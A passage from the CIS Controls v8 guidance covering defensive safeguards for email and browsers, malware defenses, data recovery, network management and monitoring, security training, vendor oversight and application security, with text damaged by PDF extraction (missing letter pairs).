the most common threats. A best prac ce is to enable these content filters and turn on the
pop-up blockers. Pop-ups are not only annoying; they can also host embedded malware
directly or lure users into clicking links using social engineering tricks. To help enforce blocking
of known malicious domains, also consider subscribing to DNS filtering services to block
a empts to access these websites at the network level.
Email
Email represents one the most interac ve ways humans work with enterprise assets; training
and encouraging the right behavior is just as important as the technical se ngs. Email is the
most common threat vector against enterprises through tac cs such as phishing and Business
Email Compromise (BEC).
Using a spam-filtering tool and malware scanning at the email gateway reduces the number
of malicious emails and a achments that come into the enterprise’s network. Ini a ng
Domain-based Message Authen ca on, Repor ng, and Conformance (DMARC) helps reduce
spam and phishing ac vi es. Installing an encryp on tool to secure email and
communica ons adds another layer of user and network-based security. In addi on to
blocking based on the sender, it is also worthwhile to only allow certain file types that users
need for their jobs. This will require coordina on with different business units to understand
what types of files they receive via email to ensure that there is not an interrup on to their
processes.
Since phishing email techniques are ever evolving to get past Something Posing as Mail
(SPAM) filter rules, it is important to train users on how to iden fy phishing, and to no fy IT
Security when they see one. There are many pla orms that perform phishing tests against
users to help educate them on different examples, and track their improvement over me.
Crowd-sourcing this knowledge into no fying IT Security teams of phishing helps improve the
protec ons and detec ons of email-based threats.
Safeguards
9.1 Ensure Use of Only Fully Supported Browsers and Applica ons -Protect- •••
Email Clients
Ensure only fully supported browsers and email clients are allowed to execute in the enterprise, only using the latest version
of browsers and email clients provided through the vendor.
9.2 Use DNS Filtering Services Network -Protect- •••

Use DNS filtering services on all enterprise assets to block access to known malicious domains.
9.3 Maintain and Enforce Network-Based URL Filters Network -Protect- ••

Enforce and update network-based URL filters to limit an enterprise asset from connec ng to poten ally malicious or
unapproved websites. Example implementa ons include category-based filtering, reputa on-based filtering, or through the
use of block lists. Enforce filters for all enterprise assets.
9.4 Restrict Unnecessary or Unauthorized Browser and Email Applica ons -Protect- ••
Client Extensions
Restrict, either through uninstalling or disabling, any unauthorized or unnecessary browser or email client plugins,
extensions, and add-on applica ons.
To lower the chance of spoofed or modified emails from valid domains, implement DMARC policy and verifica on, star ng
with implemen ng the Sender Policy
Framework (SPF) and the DomainKeys Iden fied
Mail (DKIM) standards.
9.6 Block Unnecessary File Types Network -Protect- ••

Block unnecessary file types a emp ng to enter the enterprise’s email gateway.
9.7 Deploy and Maintain Email Server An -Malware Protec ons Network -Protect- •
Deploy and maintain email server an -malware protec ons, such as a achment scanning and/or sandboxing.

Malware Defenses
Safeguards 7 IG1• 3/7 IG2• 7/7 IG3• 7/7
Total•
Overview Prevent or control the installa on, spread, and execu on of malicious
applica ons, code, or scripts on enterprise assets.

Malicious so ware (some mes categorized as viruses or Trojans) is an integral and dangerous
aspect of internet threats. They can have many purposes, from capturing creden als, stealing
data, iden fying other targets within the network, and encryp ng or destroying data.
Malware is ever-evolving and adap ve, as modern variants leverage machine learning
techniques.
Malware enters an enterprise through vulnerabili es within the enterprise on end-user

devices, email a achments, webpages, cloud services, mobile devices, and removable media.
Malware o en relies on insecure end-user behavior, such as clicking links, opening
a achments, installing so ware or profiles, or inser ng Universal Serial Bus (USB) flash drives.
Modern malware is designed to avoid, deceive, or disable defenses.
Malware defenses must be able to operate in this dynamic environment through automa on,
mely and rapid upda ng, and integra on with other processes like vulnerability
management and incident response. They must be deployed at all possible entry points and
enterprise assets to detect, prevent spread, or control the execu on of malicious so ware or
code.

Effec ve malware protec on includes tradi onal endpoint malware preven on and detec on
suites. To ensure malware IOCs are up-to-date, enterprises can receive automated updates
from the vendor to enrich other vulnerability or threat data. These tools are best managed
centrally to provide consistency across the infrastructure.
Being able to block or iden fy malware is only part of this CIS Control; there is also a focus on
centrally collec ng the logs to support aler ng, iden fica on, and incident response. As
malicious actors con nue to develop their methodologies, many are star ng to take a “living-
off-the-land” (LotL) approach to minimize the likelihood of being caught. This approach refers
to a acker behavior that uses tools or features that already exist in the target environment.
Enabling logging, as per the Safeguards in CIS Control 8, will make it significantly easier for
the enterprise to follow the events to understand what happened and why it happened.
Control 10: Malware Defenses

Safeguards
NUMBERTITLE/ DESCRIPTION ASSET TYPE SECURITY FUNCTION IG1 IG2 IG3
10.1 Deploy and Maintain An -Malware So ware Devices -Protect- •••

Deploy and maintain an -malware so ware on all enterprise assets.
10.2 Configure Automa c An -Malware Signature Updates Devices -Protect- •••

Configure automa c updates for an -malware signature files on all enterprise assets.
10.3 Disable Autorun and Autoplay for Removable Media Devices -Protect- •••
Disable autorun and autoplay auto-execute func onality for removable media.
10.4 Configure Automa c An -Malware Scanning of Devices -Detect- ••

Removable Media
Configure an -malware so ware to automa cally scan removable media.
10.5 Enable An -Exploita on Features Devices -Protect- ••

Enable an -exploita on features on enterprise assets and so ware, where possible, such as Microso ® Data Execu on
Preven on (DEP), Windows® Defender Exploit Guard (WDEG), or Apple® System Integrity Protec on (SIP) and Gatekeeper™.

Control 10: Malware Defenses
Data
Recovery
Total•
Overview Establish and maintain data recovery prac ces sufficient to

restore in-scope enterprise assets to a pre-incident and trusted
state.

In the cybersecurity triad—Confiden ality, Integrity, and Availability (CIA)—the availability of
data is, in some cases, more cri cal than its confiden ality. Enterprises need many types of
data to make business decisions, and when that data is not available or is untrusted, then it
could impact the enterprise. An easy example is weather informa on to a transporta on
enterprise.
When a ackers compromise assets, they make changes to configura ons, add accounts, and
o en add so ware or scripts. These changes are not always easy to iden fy, as a ackers might
have corrupted or replaced trusted applica ons with malicious versions, or the changes might
appear to be standard-looking account names. Configura on changes can include adding or
changing registry entries, opening ports, turning off security services, dele ng logs, or other
malicious ac ons that make a system insecure. These ac ons do not have to be malicious;
human error can cause each of these as well. Therefore, it is important to have an ability to
have recent backups or mirrors to recover enterprise assets and data back to a known trusted
state.
There has been an exponen al rise in ransomware over the last few years. It is not a new
threat, though it has become more commercialized and organized as a reliable method for
a ackers to make money. If an a acker encrypts an enterprise’s data and demands ransom for
its restora on, having a recent backup to recover to a known, trusted state can be helpful.
However, as ransomware has evolved, it has also become an extor on technique, where data
is exfiltrated before being encrypted, and the a acker asks for payment to restore the
enterprise’s data, as well as to keep it from being sold or publicized. In this case, restora on
would only solve the issue of restoring systems to a trusted state and con nuing opera ons.
Leveraging the guidance within the CIS Controls will help reduce the risk of ransomware
through improved cyber hygiene, as a ackers usually use older or basic exploits on insecure
systems.

Control 11: Data Recovery

Data recovery procedures should be defined in the data management process described in CIS
Control 3, Data Protec on. This should include backup procedures based on data value,
sensi vity, or reten on requirements. This will assist in developing backup frequency and type
(full vs. incremental).
Once per quarter (or whenever a new backup process or technology is introduced), a
tes ng team should evaluate a random sampling of backups and a empt to restore them
on a test bed environment. The restored backups should be verified to ensure that the
opera ng system, applica on, and data from the backup are all intact and func onal.
In the event of malware infec on, restora on procedures should use a version of the backup
that is believed to predate the original infec on.
Safeguards
11.1 Establish and Maintain a Data Recovery Process Data -Recover- •••
Establish and maintain a data recovery process. In the process, address the scope of data recovery ac vi es, recovery
priori za on, and the security of backup data. Review and update documenta on annually, or when significant enterprise
changes occur that could impact this Safeguard.
11.2 Perform Automated Backups Data -Recover- •••

Perform automated backups of in-scope enterprise assets. Run backups weekly, or more frequently, based on the sensi vity
of the data.
11.3 Protect Recovery Data Data -Protect- •••

Protect recovery data with equivalent controls to the original data. Reference encryp on or data separa on, based on
requirements.
11.4 Establish and Maintain an Isolated Instance of Data -Recover- •••

Recovery Data
Establish and maintain an isolated instance of recovery data. Example implementa ons include version controlling backup
des na ons through offline, cloud, or off-site systems or services.
11.5 Test Data Recovery Data -Recover- ••

Test backup recovery quarterly, or more frequently, for a sampling of in-scope enterprise assets.

Control 11: Data Recovery

Network
Infrastructure Management
Total•
Overview Establish, implement, and ac vely manage (track, report, correct)

network devices, in order to prevent a ackers from exploi ng
vulnerable network services and access points.

Secure network infrastructure is an essen al defense against a acks. This includes an
appropriate security architecture, addressing vulnerabili es that are, o en mes, introduced
with default se ngs, monitoring for changes, and reassessment of current configura ons.
Network infrastructure includes devices such as physical and virtualized gateways, firewalls,
wireless access points, routers, and switches.
Default configura ons for network devices are geared for ease-of-deployment and ease-of-
use—not security. Poten al default vulnerabili es include open services and ports, default
accounts and passwords (including service accounts), support for older vulnerable protocols,
and pre-installa on of unneeded so ware. A ackers search for vulnerable default se ngs,
gaps or inconsistencies in firewall rule sets, routers, and switches and use those holes to
penetrate defenses. They exploit flaws in these devices to gain access to networks, redirect
traffic on a network, and intercept data while in transmission.
Network security is a constantly changing environment that necessitates regular re-

evalua on of architecture diagrams, configura ons, access controls, and allowed traffic flows.
A ackers take advantage of network device configura ons becoming less secure over me as
users demand excep ons for specific business needs. Some mes the excep ons are
CIS Controls v8 Control 12: Network Infrastructure Management Page 44

deployed, but not removed when they are no longer applicable to the business’s needs. In
some cases, the security risk of an excep on is neither properly analyzed nor measured
against the associated business need and can change over me.

Enterprises should ensure network infrastructure is fully documented and architecture
diagrams are kept up-to-date. It is important for key infrastructure components to have
vendor support for patches and feature upgrades. Upgrade End-of-Life (EOL) components
before the date they will be out of support or apply mi ga ng controls to isolate them.
Enterprises need to monitor their infrastructure versions and configura ons for
vulnerabili es that would require them to upgrade the network devices to the latest secure
and stable version that does not impact the infrastructure.
An up-to-date network architecture diagram, including security architecture diagrams, are an

important founda on for infrastructure management. Next is having complete account
management for access control, logging, and monitoring. Finally, infrastructure administra on
should only be performed over secure protocols, with strong authen ca on (MFA for PAM),
and from dedicated administra ve devices or out-o and networks.
Commercial tools can be helpful to evaluate the rule sets of network filtering devices to
determine whether they are consistent or in conflict. This provides an automated sanity check
of network filters. These tools search for errors in rule sets or Access Controls Lists (ACLs) that
may allow unintended services through the network device. Such tools should be run each
me significant changes are made to firewall rule sets, router ACLs, or other filtering
technologies.
→ For telework and small office guidance, refer to the CIS Controls Telework and Small
Office Network Security Guide – h ps://www.cisecurity.org/controls/v8/
Safeguards
Ensure network infrastructure is kept up-to-date. Example implementa ons include running the latest stable release of
so ware and/or using currently supported network-as-a-service (NaaS) offerings. Review so ware versions monthly, or more
frequently, to verify so ware support.
12.2 Establish and Maintain a Secure Network Architecture Network -Protect- ••

Establish and maintain a secure network architecture. A secure network architecture must address segmenta on, least
privilege, and availability, at a minimum.
12.3 Securely Manage Network Infrastructure Network -Protect- ••

Securely manage network infrastructure. Example implementa ons include version-controlled-infrastructure-ascode, and the
use of secure network protocols, such as SSH and HTTPS.

12.4 Establish and Maintain Architecture Diagram(s) Network -Iden fy- ••
Establish and maintain architecture diagram(s) and/or other network system documenta on. Review and update
12.5 Centralize Network Authen ca on, Authoriza on, and Network -Protect- ••
Audi ng (AAA)
Centralize network AAA.
Use secure network management and communica on protocols (e.g., 802.1X, Wi-Fi Protected Access 2 (WPA2) Enterprise or
greater).
12.7 Ensure Remote Devices U lize a VPN and are Connec ng to Devices -Protect- ••
an Enterprise’s AAA Infrastructure
Require users to authen cate to enterprise-managed VPN and authen ca on services prior to accessing enterprise resources
on end-user devices.
12.8 Establish and Maintain Dedicated Compu ng Resources for Devices -Protect- •
All Administra ve Work
Establish and maintain dedicated compu ng resources, either physically or logically separated, for all administra ve tasks or
tasks requiring administra ve access. The compu ng resources should be segmented from the enterprise’s primary network
and not be allowed internet access.

Network Monitoring and
Defense
Overview Operate processes and tooling to establish and maintain

comprehensive network monitoring and defense against security
threats across the enterprise’s network infrastructure and user base.

We cannot rely on network defenses to be perfect. Adversaries con nue to evolve and
mature, as they share, or sell, informa on among their community on exploits and bypasses
to security controls. Even if security tools work “as adver sed,” it takes an understanding of
the enterprise risk posture to configure, tune, and log them to be effec ve. O en,
misconfigura ons due to human error or lack of knowledge of tool capabili es give
enterprises a false sense of security.
Security tools can only be effec ve if they are suppor ng a process of con nuous monitoring
that allows staff the ability to be alerted and respond to security incidents quickly. Enterprises
that adopt a purely technology-driven approach will also experience more false posi ves, due
to their over-reliance on alerts from tools. Iden fying and responding to these threats requires
visibility into all threat vectors of the infrastructure and leveraging humans in the process of
detec on, analysis, and response. It is cri cal for large or heavily targeted enterprises to have
a security opera ons capability to prevent, detect, and quickly respond to cyber threats before
they can impact the enterprise. This process will generate ac vity reports and metrics that will
help enhance security policies, and support regulatory compliance for many enterprises.
As we have seen many mes in the press, enterprises have been compromised for weeks,
months, or years before discovery. The primary benefit of having comprehensive situa onal
awareness is to increase the speed of detec on and response. This is cri cal to respond
quickly when malware is discovered, creden als are stolen, or when sensi ve data is
compromised to reduce impact to the enterprise.
CIS Controls v8 Control 13: Network Monitoring and Defense Page 47

Through good situa onal awareness (i.e., security opera ons), enterprises will iden fy and
catalog Tac cs, Techniques, and Procedures (TTPs) of a ackers, including their IOCs that will
help the enterprise become more proac ve in iden fying future threats or incidents. Recovery
can be achieved faster when the response has access to complete informa on about the
environment and enterprise structure to develop efficient response strategies.

Most enterprises do not need to stand up a Security Opera ons Center (SOC) to gain
situa onal awareness. This starts with first understanding cri cal business func ons,
network and server architectures, data and data flows, vendor service and business partner
connec on, and end-user devices and accounts. This informs the development of a security
architecture, technical controls, logging, monitoring, and response procedures.
At the core of this process is a trained and organized team that implements processes for
incident detec on, analysis, and mi ga on. These capabili es could be conducted internally,
or through consultants or a managed service provider. Enterprises should consider network,
enterprise asset, user creden al, and data access ac vi es. Technology will play a crucial role
to collect and analyze all of the data, and monitor networks and enterprise assets internally
and externally to the enterprise. Enterprises should include visibility to cloud pla orms that
might not be in line with on-premises security technology.
Forwarding all important logs to analy cal programs, such as Security Informa on and Event
Management (SIEM) solu ons, can provide value; however, they do not provide a complete
picture. Weekly log reviews are necessary to tune thresholds and iden fy abnormal events.
Correla on tools can make audit logs more useful for subsequent manual inspec on. These
tools are not a replacement for skilled informa on security personnel and system
administrators. Even with automated log analysis tools, human exper se and intui on are
o en required to iden fy and understand a acks.
As this process matures, enterprises will create, maintain, and evolve a knowledge base that
will help to understand and assess the business risks, developing an internal threat intelligence
capability. Threat intelligence is the collec on of TTPs from incidents and adversaries. To
accomplish this, a situa onal awareness program will define and evaluate which informa on
sources are relevant to detect, report, and handle a acks. Most mature enterprises can evolve
to threat hun ng, where trained staff manually review system and user logs, data flows, and
traffic pa erns to find anomalies.
Safeguards
Centralize security event aler ng across enterprise assets for log correla on and analysis. Best prac ce implementa on
requires the use of a SIEM, which includes vendor-defined event correla on alerts. A log analy cs pla orm configured with
security-relevant correla on alerts also sa sfies this Safeguard.
13.2 Deploy a Host-Based Intrusion Detec on Solu on Devices -Detect- ••

Deploy a host-based intrusion detec on solu on on enterprise assets, where appropriate and/or supported.

13.3 Deploy a Network Intrusion Detec on Solu on Network -Detect- ••
Deploy a network intrusion detec on solu on on enterprise assets, where appropriate. Example implementa ons include the
use of a Network Intrusion Detec on System (NIDS) or equivalent cloud service provider (CSP) service.
13.4 Perform Traffic Filtering Between Network Segments Network -Protect- ••

Perform traffic filtering between network segments, where appropriate.
Manage access control for assets remotely connec ng to enterprise resources. Determine amount of access to enterprise
resources based on: up-to-date an -malware so ware installed, configura on compliance with the enterprise’s secure
configura on process, and ensuring the opera ng system and applica ons are up-to-date.
13.6 Collect Network Traffic Flow Logs Network -Detect- ••

Collect network traffic flow logs and/or network traffic to review and alert upon from network devices.
13.7 Deploy a Host-Based Intrusion Preven on Solu on Devices -Protect- •

Deploy a host-based intrusion preven on solu on on enterprise assets, where appropriate and/or supported.
Example implementa ons include use of an Endpoint Detec on and Response (EDR) client or host-based IPS agent.
13.8 Deploy a Network Intrusion Preven on Solu on Network -Protect- •

Deploy a network intrusion preven on solu on, where appropriate. Example implementa ons include the use of a Network
Intrusion Preven on System (NIPS) or equivalent CSP service.
13.9 Deploy Port-Level Access Control Devices -Protect- •

Deploy port-level access control. Port-level access control u lizes 802.1x, or similar network access control protocols, such as
cer ficates, and may incorporate user and/or device authen ca on.
13.10 Perform Applica on Layer Filtering Network -Protect- •

Perform applica on layer filtering. Example implementa ons include a filtering proxy, applica on layer firewall, or gateway.
13.11 Tune Security Event Aler ng Thresholds Network -Detect-
•
Tune security event aler ng thresholds monthly, or more frequently.

Security Awareness and Skills
Training
Overview Establish and maintain a security awareness program to influence

behavior among the workforce to be security conscious and properly
skilled to reduce cybersecurity risks to the enterprise.

The ac ons of people play a cri cal part in the success or failure of an enterprise’s security
program. It is easier for an a acker to en ce a user to click a link or open an email a achment
to install malware in order to get into an enterprise, than to find a network exploit to do it
directly.
Users themselves, both inten onally and uninten onally, can cause incidents as a result of
mishandling sensi ve data, sending an email with sensi ve data to the wrong recipient, losing
a portable end-user device, using weak passwords, or using the same password they use on
public sites.
No security program can effec vely address cyber risk without a means to address this
fundamental human vulnerability. Users at every level of the enterprise have different risks.
For example: execu ves manage more sensi ve data; system administrators have the ability
to control access to systems and applica ons; and users in finance, human resources, and
contracts all have access to different types of sensi ve data that can make them targets.
The training should be updated regularly. This will increase the culture of security and
discourage risky workarounds.
CIS Controls v8 Control 14: Security Awareness and Skills Training Page 50
An effec ve security awareness training program should not just be a canned, oncea-year
training video coupled with regular phishing tes ng. While annual training is needed, there
should also be more frequent, topical messages and no fica ons about security. This might
include messages about: strong password-use that coincides with a media report of password
dump, the rise of phishing during tax me, or increased awareness of malicious package
delivery emails during the holidays.
Training should also consider the enterprise’s different regulatory and threat posture. Financial
firms might have more compliance-related training on data handling and use, healthcare
enterprises on handling healthcare data, and merchants for credit card data.
Social engineering training, such as phishing tests, should also include awareness of tac cs
that target different roles. For example, the financial team will receive BEC a empts posing
as execu ves asking to wire money, or receive emails from compromised partners or
vendors asking to change the bank account informa on for their next payment.
For more comprehensive treatment of this topic, the following resources are helpful to build
an effec ve security awareness program:
→ NIST® SP 800-50 Infosec Awareness Training – h ps://nvlpubs.nist.gov/nistpubs/

Legacy/SP/nistspecialpublica on800-50.pdf → Na onal Cyber Security Centre (UK) –
h ps://www.ncsc.gov.uk/guidance/10steps-user-educa on-and-awareness
→ EDUCAUSE – h ps://www.educause.edu/focus-areas-and-ini a ves/policy-

andsecurity/cybersecurity-program/awareness-campaigns
→ Na onal Cyber Security Alliance (NCSA) – h ps://staysafeonline.org/
→ SANS – h ps://www.sans.org/security-awareness-training/resources
→ For guidance on configuring home routers see the CIS Controls Telework and Small Office Network
Security Guide – h ps://www.cisecurity.org/white-papers/ciscontrols-telework-and-
small-office-network-security-guide/
Safeguards
NUMBERTITLE/DESCRIPTION ASSET TYPE SECURITY IG1 IG2 IG3
FUNCTION
••• 14.1 Establish and Maintain a Security Awareness Program N/A -Protect-
Establish and maintain a security awareness program. The purpose of a security awareness program is to educate the
enterprise’s workforce on how to interact with enterprise assets and data in a secure manner. Conduct training at hire and, at
a minimum, annually. Review and update content annually, or when significant enterprise changes occur that could impact
this Safeguard.
14.2 Train Workforce Members to Recognize Social N/A -Protect-
Engineering A acks •••

14.3 Train Workforce Members on Authen ca on Best Prac ces N/A -Protect-
Train workforce members to recognize social engineering a acks, such as phishing, pre-tex ng, and tailga ng. •••
Train workforce members on authen ca on best prac ces. Example topics include MFA, password composi on, and
14.4 Train Workforce on Data Handling Best Prac ces N/A -Protect-
creden al management. •••

Train workforce members on how to iden fy and properly store, transfer, archive, and destroy sensi ve data. This also
includes training workforce members on clear screen and desk best prac ces, such as locking their screen when they step
away from their enterprise asset, erasing physical and virtual whiteboards at the end of mee ngs, and storing data and
assets securely.
14.5 Train Workforce Members on Causes of Uninten onal N/A -Protect- •••
Data Exposure
Train workforce members to be aware of causes for uninten onal data exposure. Example topics include mis-delivery of
sensi ve data, losing a portable end-user device, or publishing data to unintended audiences.
14.6 Train Workforce Members on Recognizing and Repor ng N/A -Protect- •••
Security Incidents
Train workforce members to be able to recognize a poten al incident and be able to report such an incident.
14.7 Train Workforce on How to Iden fy and Report if Their N/A -Protect- •••
Enterprise Assets are Missing Security Updates
Train workforce to understand how to verify and report out-of-date so ware patches or any failures in automated processes
and tools. Part of this training should include no fying IT personnel of any failures in automated processes and tools.
14.8 Train Workforce on the Dangers of Connec ng to and N/A -Protect- •••
Transmi ng Enterprise Data Over Insecure Networks
Train workforce members on the dangers of connec ng to, and transmi ng data over, insecure networks for enterprise
ac vi es. If the enterprise has remote workers, training must include guidance to ensure that all users securely configure
their home network infrastructure.
14.9 Conduct Role-Specific Security Awareness and N/A -Protect- ••
Skills Training
Conduct role-specific security awareness and skills training. Example implementa ons include secure system administra on
courses for IT professionals, OWASP® Top 10 vulnerability awareness and preven on training for web applica on developers,
and advanced social engineering awareness training for high-profile roles.
Service Provider Management
Overview Develop a process to evaluate service providers who hold

sensi ve data, or are responsible for an enterprise’s cri cal IT pla orms
or processes, to ensure these providers are protec ng those pla orms
and data appropriately.

In our modern, connected world, enterprises rely on vendors and partners to help manage
their data or rely on third-party infrastructure for core applica ons or func ons.
There have been numerous examples where third-party breaches have significantly impacted
an enterprise; for example, as early as the late 2000s, payment cards were compromised a er
a ackers infiltrated smaller third-party vendors in the retail industry. More recent examples
include ransomware a acks that impact an enterprise indirectly, due to one of their service
providers being locked down, causing disrup on to business. Or worse, if directly connected, a
ransomware a ack could encrypt data on the main enterprise.
Most data security and privacy regula ons require their protec on extend to third-party
service providers, such as with Health Insurance Portability and Accountability Act (HIPAA)
Business Associate agreements in healthcare, Federal Financial Ins tu ons
Examina on Council (FFIEC) requirements for the financial industry, and the United
Kingdom (U.K.) Cyber Essen als. Third-party trust is a core Governance Risk and Compliance
(GRC) func on, as risks that are not managed within the enterprise are transferred to en es
outside the enterprise.
While reviewing the security of third-par es has been a task performed for decades, there is
not a universal standard for assessing security; and, many service providers are being
audited by their customers mul ple mes a month, causing impacts to their own
produc vity. This is because every enterprise has a different “checklist” or set of standards to
grade the service provider. There are only a few industry standards, such as in finance, with
the Shared Assessments program, or in higher educa on, with their Higher Educa on
Community Vendor Assessment Toolkit (HECVAT). Insurance companies selling cybersecurity
policies also have their own measurements.
CIS Controls v8 Control 15: Service Provider Management Page 54

While an enterprise might put a lot of scru ny into large cloud or applica on hos ng
companies because they are hos ng their email or cri cal business applica ons, smaller firms
are o en a greater risk. O en mes, a third-party service provider contracts with addi onal
par es to provide other plugins or services, such as when a third-party uses a fourth-party
pla orm or product to support the main enterprise.

Most enterprises have tradi onally used standard checklists, such as ones from ISO 27001 or
the CIS Controls. O en, this process is managed through spreadsheets; however, there are
online pla orms now that allow central management of this process. The focus of this CIS
Control though is not on the checklist; instead it is on the fundamentals of the program. Make
sure to revisit annually, as rela onships and data may change.
No ma er what the enterprise’s size, there should be a policy about reviewing service
providers, an inventory of these vendors, and a risk ra ng associated with their poten al
impact to the business in case of an incident. There should also be language in the contracts
to hold them accountable if there is an incident that impacts the enterprise.
There are third-party assessment pla orms that have an inventory of thousands of service
providers, which a empt to provide a central view of the industry, to help enterprises make
more informed risk decisions. These pla orms o en have a dynamic risk score for service
providers, based (usually) on passive technical assessments, or enriched through other firms’
third-party assessments.
When performing reviews, focus on the services or departments of the provider that are
suppor ng the enterprise. A third-party that has a managed security service contract, or
retainer, and holds cybersecurity insurance, can also help with risk reduc on.
It is also important to securely decommission service providers when contracts are completed
or terminated. Decommission ac vi es may include user and service account deac va on,
termina on of data flows, and secure disposal of enterprise data within service provider
systems.
→ Refer to NIST® 800-88r1: Guidelines for Media Sani za on, as appropriate – h ps://
nvlpubs.nist.gov/nistpubs/SpecialPublica ons/NIST.SP.800-88r1.pdf
Safeguards
NUMBERTITLE/DESCRIPTION ASSET TYPE SECURITY IG1 IG2 IG3
FUNCTION
••• 15.1 Establish and Maintain an Inventory of Service Providers N/A -Iden fy-
Establish and maintain an inventory of service providers. The inventory is to list all known service providers, include
classifica on(s), and designate an enterprise contact for each service provider. Review and update the inventory annually, or
when significant enterprise changes occur that could impact this Safeguard.

15.2 Establish and Maintain a Service Provider N/A -Iden fy-
Management Policy ••
Establish and maintain a service provider management policy. Ensure the policy addresses the classifica on, inventory,
assessment, monitoring, and decommissioning of service providers. Review and update the policy annually, or when
significant enterprise changes occur that could impact this Safeguard.
Classify service providers. Classifica on considera on may include one or more characteris cs, such as data sensi vity, data
volume, availability requirements, applicable regula ons, inherent risk, and mi gated risk. Update and review classifica ons
annually, or when significant enterprise changes occur that could impact this Safeguard.
15.4 Ensure Service Provider Contracts Include Security N/A -Protect- ••

Requirements
Ensure service provider contracts include security requirements. Example requirements may include minimum security
program requirements, security incident and/or data breach no fica on and response, data encryp on requirements, and
data disposal commitments. These security requirements must be consistent with the enterprise’s service provider
management policy. Review service provider contracts annually to ensure contracts are not missing security requirements.
Assess service providers consistent with the enterprise’s service provider management policy. Assessment scope may vary
based on classifica on(s), and may include review of standardized assessment reports, such as Service Organiza on Control 2
(SOC 2) and Payment Card Industry (PCI) A esta on of Compliance (AoC), customized ques onnaires, or other appropriately
rigorous processes. Reassess service providers annually, at a minimum, or with new and renewed contracts.
Monitor service providers consistent with the enterprise’s service provider management policy. Monitoring may include
periodic reassessment of service provider compliance, monitoring service provider release notes, and dark web monitoring.
15.7 Securely Decommission Service Providers Data -Protect- •

Securely decommission service providers. Example considera ons include user and service account deac va on, termina on
of data flows, and secure disposal of enterprise data within service provider systems.

Applica on So ware Security
Overview Manage the security life cycle of in-house developed, hosted, or

acquired so ware to prevent, detect, and remediate security
weaknesses before they can impact the enterprise.

Applica ons provide a human-friendly interface to allow users to access and manage data in a
way that is aligned to business func ons. They also minimize the need for users to deal
directly with complex (and poten ally error-prone) system func ons, like logging into a
database to insert or modify files. Enterprises use applica ons to manage their most sensi ve
data and control access to system resources. Therefore, an a acker can use the applica on
itself to compromise the data, instead of an elaborate network and system hacking sequence
that a empts to bypass network security controls and sensors. This is why protec ng user
creden als (specifically applica on creden als) defined in CIS Control 6 is so important.
Lacking creden als, applica on flaws are the a ack vector of choice. However, today’s
applica ons are developed, operated, and maintained in a highly complex, diverse, and
dynamic environment. Applica ons run on mul ple pla orms: web, mobile, cloud, etc., with
applica on architectures that are more complex than legacy client-server or database-web
server structures. Development life cycles have become shorter, transi oning from months
or years in long waterfall methodologies, to DevOps cycles with frequent code updates. Also,
applica ons are rarely created from scratch, and are o en “assembled” from a complex mix
of development frameworks, libraries, exis ng code, and new code. There are also modern
and evolving data protec on regula ons dealing with user privacy. These may require
compliance to regional or sector-specific data protec on requirements.
These factors make tradi onal approaches to security, like control (of processes, code sources,
run- me environment, etc.), inspec on, and tes ng, much more challenging. Also, the risk
that an applica on vulnerability introduces might not be understood, except in a specific
opera onal se ng or context.
Applica on vulnerabili es can be present for many reasons: insecure design, insecure
infrastructure, coding mistakes, weak authen ca on, and failure to test for unusual or
unexpected condi ons. A ackers can exploit specific vulnerabili es, including buffer
overflows, exposure to Structured Query Language (SQL) injec on, cross-site scrip ng, cross-
CIS Controls v8 Control 16: Applica on So ware Security Page 57

site request forgery, and click-jacking of code to gain access to sensi ve data, or take control
over vulnerable assets within the infrastructure as a launching point for further a acks.
Applica ons and websites can also be used to harvest creden als, data, or a empt to install
malware onto the users who access them.
Finally, it is now more common to acquire So ware as a Service (SaaS) pla orms, where
so ware is developed and managed en rely through a third-party. These might be hosted
anywhere in the world. This brings challenges to enterprises that need to know what risks
they are accep ng with using these pla orms; and, they o en do not have visibility into the
development and applica on security prac ces of these pla orms. Some of these SaaS
pla orms allow for customizing of their interfaces and databases. Enterprises that extend
these applica ons should follow this CIS Control, similar to if they were doing ground-up
customer development.

For Version 8, CIS partnered with SAFECode to help develop the procedures and Safeguards for
this updated Applica on So ware Security Control. However, applica on so ware security is a
large topic on its own, and so (consistent with the principles of the overall CIS Controls), we
focus here on the most cri cal Safeguards. These were derived from a companion paper on
applica on so ware security that SAFECode developed (referenced below), which provides a
more in-depth treatment of the topic, and is consistent with SAFECode’s exis ng body of
content.
SAFECode developed a three- ered approach to help readers iden fy which

Development Group (DG) they fit in as a maturity scale for development programs. The
three CIS IG levels used within the Safeguards inspired their approach for the DGs below:
Development Group 1
• The enterprise largely relies on off-the-shelf or Open Source So ware (OSS) and packages
with only the occasional addi on of small applica ons or website coding. The enterprise is
capable of applying basic opera onal and procedural best prac ces and of managing the
security of its vendor-supplied so ware as a result of following the guidance of the CIS
Controls.
Development Group 2
• The enterprise relies on some custom (in-house or contractor-developed) web and/or

na ve code applica ons integrated with third-party components and runs on-premises or
in the cloud. The enterprise has a development staff that applies so ware development
best prac ces. The enterprise is a en ve to the quality and maintenance of third-party
open source or commercial code on which it depends.
Development Group 3
• The enterprise makes a major investment in custom so ware that it requires to run its
business and serve its customers. It may host so ware on its own infrastructure, in the
cloud, or both, and may integrate a large range of third-party open source and commercial
so ware components. So ware vendors and enterprises that deliver SaaS should consider
Development Group 3 as a minimum set of requirements.

The first step in developing an applica on security program is implemen ng a vulnerability
management process. This process must integrate into the development life cycle, and should
be lightweight to insert into the standard bug-fixing progress. The process should include root
cause analysis to fix underlying flaws so as to reduce future vulnerabili es, and a severity
ra ng to priori ze remedia on efforts.
Developers need to be trained in applica on security concepts and secure coding prac ces.
This includes a process to acquire or evaluate third-party so ware, modules, and libraries
used in the applica on to ensure they do not introduce security flaws. The developers should
be taught what types of modules they can securely use, where they can be safely acquired,
and which components they can, or should not, develop themselves (e.g., encryp on).
Weaknesses in the infrastructure that supports these applica ons can introduce risk. The
CIS Controls and the concept of minimizing the a ack surface can help secure networks,
systems, and accounts that are used within the applica on. Specific guidance can be found
in CIS Controls 1-7, 12, and 13.
The ideal applica on security program is one that introduces security as early into the
so ware development life cycle as possible. The management of security problems should be
consistent and integrated with standard so ware flaw/bug management, as opposed to a
separate process that competes for development resources. Larger or more mature
development teams should consider the prac ce of threat modeling in the design phase.
Design-level vulnerabili es are less common than code-level vulnerabili es; however, they
o en are very severe and much harder to fix quickly. Threat modeling is the process of
iden fying and addressing applica on security design flaws before code is created. Threat
modeling requires specific training, technical, and business knowledge. It is best conducted
through internal “security champions” in each development team, to lead threat modeling
prac ces for that team’s so ware. It also provides valuable context to downstream ac vi es,
such as root cause analysis and security tes ng.
